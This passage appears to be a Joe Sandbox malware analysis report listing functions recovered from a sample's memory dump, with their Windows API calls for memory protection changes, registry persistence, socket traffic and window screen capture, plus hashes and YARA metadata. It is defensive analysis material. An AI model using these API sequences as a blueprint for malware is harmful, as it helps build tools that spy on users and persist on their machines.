                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Security$Descriptor$HandleMutex$CloseConvertCreateFreeInfoInformationLocalNamedReleaseSaclSleepString
                                                                                                                                                                                                              • String ID: Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}$P0Mw
                                                                                                                                                                                                              • API String ID: 1370207991-2204230210
                                                                                                                                                                                                              • Opcode ID: 12ceadf6ea3d707a4d4b92a9862973acfa4db90a7dbc93b517a5ae77a744aa89
                                                                                                                                                                                                              • Instruction ID: 9d1c0afc307371eaa309ec79c37a568ff3a7ca26e64399a97c3cb6bbf421272d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 12ceadf6ea3d707a4d4b92a9862973acfa4db90a7dbc93b517a5ae77a744aa89
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 33F0BE30952325B7E6317B9A9C0ABDEBA9C9F06B0AF004049FA05A61C08AA056008BE1
                                                                                                                                                                                                              Function 012FA540 Relevance: 12.1, APIs: 8, Instructions: 139memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,-00000008,00003000,00000040,774CF550,00000000,7706BD50,?,?,?,012F98DA,00000000,012F9730,0133A04C), ref: 012FA578
                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,00000000,?,?,?,012F98DA,00000000,012F9730,0133A04C), ref: 012FA5A0
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(00000000,?,00000040,012F98DA,?,?,?,?,?,?,012F98DA,00000000,012F9730,0133A04C), ref: 012FA635
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(?,00000000,00000040,012F98DA,?,?,?,?,?,?,012F98DA,00000000,012F9730,0133A04C), ref: 012FA64A
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(?,00000000,012F98DA,?,?,?,00000000,00000000,?,?,?,?,?,?,012F98DA,00000000), ref: 012FA67A
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(?,00000000,012F98DA,?,?,?,?,?,?,?,012F98DA,00000000,012F9730,0133A04C), ref: 012FA686
                                                                                                                                                                                                                • Part of subcall function 012FA6B0: WaitForSingleObject.KERNEL32(?,000003E8,00000000,012FA693,?,?,?,?,?,?,012F98DA,00000000,012F9730,0133A04C), ref: 012FA6BC
                                                                                                                                                                                                                • Part of subcall function 012FA6B0: GetProcessHeap.KERNEL32(00000008,00000030,?,?,?,?,?,?,012F98DA,00000000,012F9730,0133A04C), ref: 012FA6C6
                                                                                                                                                                                                                • Part of subcall function 012FA6B0: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,012F98DA,00000000,012F9730,0133A04C), ref: 012FA6CD
                                                                                                                                                                                                                • Part of subcall function 012FA6B0: memset.MSVCRT(00000000,00000000,00000030,?,?,?,?,?,?,012F98DA,00000000,012F9730,0133A04C), ref: 012FA6DE
                                                                                                                                                                                                                • Part of subcall function 012FA6B0: ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,012F98DA,00000000,012F9730,0133A04C), ref: 012FA72A
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,774CF550,00000000,7706BD50,?,?,?,012F98DA,00000000,012F9730,0133A04C), ref: 012FA697
                                                                                                                                                                                                              • FlushInstructionCache.KERNEL32(00000000,?,?,?,012F98DA,00000000,012F9730,0133A04C), ref: 012FA69E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Virtual$Protect$AllocHeapProcess$CacheCurrentFlushInstructionMutexObjectReleaseSingleWaitmemcpymemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2609073853-0
                                                                                                                                                                                                              • Opcode ID: 6b7a5b8f75ca905cd75913e88e685318131bdf8ed3a2a54c0960d00873ed6e5a
                                                                                                                                                                                                              • Instruction ID: c1653286fe96c2d3fe8777b3201321c4ec97798a3534ce292581c9cb3ab33775
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6b7a5b8f75ca905cd75913e88e685318131bdf8ed3a2a54c0960d00873ed6e5a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F7412E72A00217ABDB249E7C8C98FBABB6DEF94214F04413CE74997244D675E901C7A0
                                                                                                                                                                                                              Function 012F9A00 Relevance: 12.1, APIs: 8, Instructions: 98networkstringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • send.WS2_32(?,01329E44,00000002,00000000), ref: 012F9A2A
                                                                                                                                                                                                              • recv.WS2_32(?,?,00000002,00000000), ref: 012F9A4E
                                                                                                                                                                                                              • recv.WS2_32(?,00000001,?,00000000), ref: 012F9A7C
                                                                                                                                                                                                              • recv.WS2_32(?,?,00000001,00000000), ref: 012F9AA0
                                                                                                                                                                                                              • recv.WS2_32(?,?,?,00000000), ref: 012F9AC5
                                                                                                                                                                                                              • lstrcmpA.KERNEL32(0132FCA8,00000001,?,?,?,00000000,?,?,00000001,00000000,?,00000001,?,00000000,?,?), ref: 012F9AED
                                                                                                                                                                                                              • lstrcmpA.KERNEL32(0132FBA0,?,?,?,?,00000000,?,?,00000001,00000000,?,00000001,?,00000000,?,?), ref: 012F9AFF
                                                                                                                                                                                                              • send.WS2_32(?,01329E48,00000002,00000000), ref: 012F9B0E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: recv$lstrcmpsend
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1090895577-0
                                                                                                                                                                                                              • Opcode ID: 7d0984314a9edea5f4239919fa9c763856e816892f78590899aa8c960a66e516
                                                                                                                                                                                                              • Instruction ID: 9b76934ecdb6b65e5e1589e2b2bbaf969341f42ddf45210a6a2ddb2ba09d3ea2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7d0984314a9edea5f4239919fa9c763856e816892f78590899aa8c960a66e516
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4231597160426E39EF21EA688C41FFEF76C9B96704F4041D9F744A7182E6B15AC68FA0
                                                                                                                                                                                                              Function 012EDDA0 Relevance: 12.1, APIs: 8, Instructions: 81windowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetWindow.USER32(?,00000005,00000001,?,00000101,?), ref: 012EDDBC
                                                                                                                                                                                                              • GetWindow.USER32(00000000), ref: 012EDDBF
                                                                                                                                                                                                              • IsWindowVisible.USER32(00000000), ref: 012EDDD1
                                                                                                                                                                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 012EDDE2
                                                                                                                                                                                                              • GetClassNameA.USER32(00000000,?,00000101), ref: 012EDDFC
                                                                                                                                                                                                              • PostMessageA.USER32(00000000,00000100,0000001B,00000000), ref: 012EDE56
                                                                                                                                                                                                              • PostMessageA.USER32(00000000,00000101,0000001B,C01B0000), ref: 012EDE65
                                                                                                                                                                                                              • GetWindow.USER32(00000000,00000003), ref: 012EDE6A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$MessagePost$ClassLongNameVisible
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4167699426-0
                                                                                                                                                                                                              • Opcode ID: a29cf2f065762065ad4fab47aea697a172c3245a96768c66f0f6a6bfea0cdab8
                                                                                                                                                                                                              • Instruction ID: bb2b0aa1bd380f9c5f8da0c88426a1b0803fbc90df1b640dc39f75930fba3df2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a29cf2f065762065ad4fab47aea697a172c3245a96768c66f0f6a6bfea0cdab8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 24215B3136021A66E731AABDAC8EFFB77ACDB59721F840218F755E30C0D7A4E5408764
                                                                                                                                                                                                              Function 012ECA90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 126windowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsWindowVisible.USER32(012ED21D,012ED21D,?,7707BCB0), ref: 012ECAAF
                                                                                                                                                                                                              • GetWindowInfo.USER32(012ED21D,?), ref: 012ECAC9
                                                                                                                                                                                                              • GetClassLongA.USER32(012ED21D,000000E6), ref: 012ECB1E
                                                                                                                                                                                                              • PrintWindow.USER32(012ED21D,?,00000000), ref: 012ECB37
                                                                                                                                                                                                              • BitBlt.GDI32(012ECD02,?,?,?,?,7707BCB0,00000000,00000000,00CC0020,012ED21D,?), ref: 012ECBDE
                                                                                                                                                                                                                • Part of subcall function 012EDCE0: GetClassNameA.USER32(?,?,00000101), ref: 012EDCF6
                                                                                                                                                                                                                • Part of subcall function 012EC8D0: SendMessageA.USER32(?,?,00000004,00000000,?,774D3050,?,012EC9F1,?,?), ref: 012EC8F8
                                                                                                                                                                                                                • Part of subcall function 012EC8D0: GdiFlush.GDI32(?,012EC9F1,?,?), ref: 012EC90E
                                                                                                                                                                                                                • Part of subcall function 012EC8D0: BitBlt.GDI32(012EC9F1,00000000,00000000,?,012EC9F1,?,00000000,00000000,00CC0020,?,012EC9F1,?,?), ref: 012EC934
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$Class$FlushInfoLongMessageNamePrintSendVisible
                                                                                                                                                                                                              • String ID: <
                                                                                                                                                                                                              • API String ID: 2334662925-4251816714
                                                                                                                                                                                                              • Opcode ID: a81186233d327f74c44f63473492790103932ccaa89b8912bc166c36d2662d93
                                                                                                                                                                                                              • Instruction ID: 091a6a83cb8b25c607ba4ea218962aecf612df22383beb746af226eb748d15c6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a81186233d327f74c44f63473492790103932ccaa89b8912bc166c36d2662d93
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5D416C71E1011AAFCF25DF98C889AADFBB9FF44310F94811DE505A7644E770A961CB90
                                                                                                                                                                                                              Function 012F0D90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104networkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012F0DC3
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012F0DEF
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012F0E16
                                                                                                                                                                                                              • HttpAddRequestHeadersA.WININET(?,?,?,A0000000), ref: 012F0E5C
                                                                                                                                                                                                              • HttpAddRequestHeadersA.WININET(?,Accept-Encoding:,00000012,A0000000), ref: 012F0E6F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryVirtual$HeadersHttpRequest
                                                                                                                                                                                                              • String ID: Accept-Encoding:
                                                                                                                                                                                                              • API String ID: 853579731-3444961765
                                                                                                                                                                                                              • Opcode ID: bf306417d98d43a9948c947da6c21ce8435c4291866b5c3b253d06051f410686
                                                                                                                                                                                                              • Instruction ID: cb47254c5f6826cd794865d9f48b276bf8b929ae4ab69cb05f2e567f919c89ab
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bf306417d98d43a9948c947da6c21ce8435c4291866b5c3b253d06051f410686
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FD310FB5D0121DAFDB50DFA9D885AEEBBF9EF48714F104029FA14E7241D3746A008FA5
                                                                                                                                                                                                              Function 012EBB50 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 92stringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012EBB8F
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012EBBBB
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012EBBE2
                                                                                                                                                                                                              • GetUserObjectInformationA.USER32(?,00000002,?,00000100,?), ref: 012EBC11
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,9e2b3b2da), ref: 012EBC27
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryVirtual$InformationObjectUserlstrcmpi
                                                                                                                                                                                                              • String ID: 9e2b3b2da
                                                                                                                                                                                                              • API String ID: 410342393-3979732383
                                                                                                                                                                                                              • Opcode ID: dd3f3165d66bf0dd1e77dd4d0bacb47bee7d4f7712edca375e543fc9a807af41
                                                                                                                                                                                                              • Instruction ID: d4a99edb7fa9b33ff51566c3ebf1c5a2564ef32bb430cccfe11f0e7667eff043
                                                                                                                                                                                                              • Opcode Fuzzy Hash: dd3f3165d66bf0dd1e77dd4d0bacb47bee7d4f7712edca375e543fc9a807af41
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8E3110B1E0020DAFDB50DFA9D885AEEBBF4FB48704F50806AE508E7240E7745A44CF90
                                                                                                                                                                                                              Function 01304BF0 Relevance: 10.6, APIs: 7, Instructions: 72processCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000124,?,775B7390,?), ref: 01304C14
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,775B7390,?), ref: 01304C1F
                                                                                                                                                                                                              • Process32First.KERNEL32 ref: 01304C45
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,775B7390), ref: 01304C60
                                                                                                                                                                                                              • Process32Next.KERNEL32(00000000,?), ref: 01304C6C
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 01304C88
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 01304C9A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleProcess32$CloseCreateFirstInformationNextSnapshotToolhelp32memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3955875343-0
                                                                                                                                                                                                              • Opcode ID: 2290d5fa38cbb0526073e7f48992cdc0596db74bbefbb555382de19e47fc5049
                                                                                                                                                                                                              • Instruction ID: eb70a96bb2f532cdbb7e8bdabab7878fad713ea513e34789df76bf65e99d20c6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2290d5fa38cbb0526073e7f48992cdc0596db74bbefbb555382de19e47fc5049
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1011A5725053116BD721EF69DC48AEBBBDCEB85368F40861DFE5483181E7309615CBE2
                                                                                                                                                                                                              Function 013112F0 Relevance: 10.6, APIs: 7, Instructions: 67networkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • htons.WS2_32(?), ref: 01311314
                                                                                                                                                                                                              • inet_addr.WS2_32(?), ref: 0131131F
                                                                                                                                                                                                              • htonl.WS2_32(000000FF), ref: 0131132A
                                                                                                                                                                                                              • gethostbyname.WS2_32(?), ref: 01311336
                                                                                                                                                                                                              • socket.WS2_32(00000002,00000001,00000000), ref: 01311350
                                                                                                                                                                                                              • connect.WS2_32(00000000,?,00000010), ref: 01311363
                                                                                                                                                                                                              • closesocket.WS2_32(00000000), ref: 0131136E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: closesocketconnectgethostbynamehtonlhtonsinet_addrsocket
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 298246419-0
                                                                                                                                                                                                              • Opcode ID: 0e97a047f81ab600df09a6d43dd569d8107dfe01faf3377b5b33b50f3a69ee15
                                                                                                                                                                                                              • Instruction ID: fa45c12851bb21dfd5759089f1f02a39f20bd867ab3dcaf132d1b9f72ae4e6c9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0e97a047f81ab600df09a6d43dd569d8107dfe01faf3377b5b33b50f3a69ee15
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C0116631A00218AFDB20EFB9DC44BEEB76DFF45355F50466DFA12D7295D67096008B50
                                                                                                                                                                                                              Function 012F1846 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 59registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000102,?,?,?), ref: 012F18AD
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,9E2B3ECFa,00000000,00000001,?,00000104), ref: 012F18CF
                                                                                                                                                                                                              • RegFlushKey.ADVAPI32(?), ref: 012F18DD
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 012F18F0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseFlushOpenValue
                                                                                                                                                                                                              • String ID: 9E2B3ECFa$software\microsoft
                                                                                                                                                                                                              • API String ID: 2510291871-2578827400
                                                                                                                                                                                                              • Opcode ID: c36968b6f10878ea0d80a1750fffef2ab0da6c8e887bb4912f18fd707d972392
                                                                                                                                                                                                              • Instruction ID: cf6526f451df1d1c07a85c957e42c15a77cfbf040fdbe63ec7bb06790ee13bbe
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c36968b6f10878ea0d80a1750fffef2ab0da6c8e887bb4912f18fd707d972392
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BE11CE70610209ABEB24DAA5CD88FEEB769EF58704F6040BCE785D7141D6749A848B50
                                                                                                                                                                                                              Function 012F98F0 Relevance: 10.5, APIs: 7, Instructions: 43networkthreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • shutdown.WS2_32(?,00000001), ref: 012F990B
                                                                                                                                                                                                              • shutdown.WS2_32(?,00000001), ref: 012F9910
                                                                                                                                                                                                              • recv.WS2_32(?,?,00000400,00000000), ref: 012F992F
                                                                                                                                                                                                              • recv.WS2_32(?,?,00000400,00000000), ref: 012F9945
                                                                                                                                                                                                              • closesocket.WS2_32(?), ref: 012F9959
                                                                                                                                                                                                              • closesocket.WS2_32(?), ref: 012F995C
                                                                                                                                                                                                              • ExitThread.KERNEL32 ref: 012F9960
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: closesocketrecvshutdown$ExitThread
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1638183600-0
                                                                                                                                                                                                              • Opcode ID: 8f918af822c1a17e14f68985ae7ada136dc3c5e44a50847cf051fc6a85aefcef
                                                                                                                                                                                                              • Instruction ID: 00c7a3321331fc357ca3b5c65448a936353191f48c29f6778a81c3d837bba768
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8f918af822c1a17e14f68985ae7ada136dc3c5e44a50847cf051fc6a85aefcef
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D0F044B2950319BBDB30AA69DC49F9B3B6DEB48754F114508FB05BB180DAB4B940CFE4
                                                                                                                                                                                                              Function 012EB921 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37synchronizationwindowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 012EB94B
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32 ref: 012EB980
                                                                                                                                                                                                              • IsWindow.USER32(?), ref: 012EB987
                                                                                                                                                                                                              • SendMessageA.USER32(?,00000215,00000000,00000000), ref: 012EB99B
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000005), ref: 012EB9AA
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLastMessageMutexObjectReleaseSendSingleWaitWindow
                                                                                                                                                                                                              • String ID: P0Mw
                                                                                                                                                                                                              • API String ID: 3816925851-1167384825
                                                                                                                                                                                                              • Opcode ID: 1cd16031096d82983520b84d27aa55475f4e6f004f2845646bb3db2a7b029d97
                                                                                                                                                                                                              • Instruction ID: d5fb140708e75f8365778f9de15ef7454467be8e3a7642d65c97d630a1ce06c4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1cd16031096d82983520b84d27aa55475f4e6f004f2845646bb3db2a7b029d97
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E0012134206201ABD730AF20E80DFD63BA8FF0A316F6081ACF2118F2C9C7B455418F90
                                                                                                                                                                                                              Function 012E38A0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 35registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000102,?), ref: 012E38C0
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(00000000,9e2b3eb7a,00000000,00000004,?,00000004), ref: 012E38DC
                                                                                                                                                                                                              • RegFlushKey.ADVAPI32(00000000), ref: 012E38EA
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 012E38F8
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseFlushOpenValue
                                                                                                                                                                                                              • String ID: 9e2b3eb7a$software\microsoft
                                                                                                                                                                                                              • API String ID: 2510291871-3208106814
                                                                                                                                                                                                              • Opcode ID: ca9ab4df70549d803e48151aafd26081337060f850de6fcab7dbbb7ea947e2e9
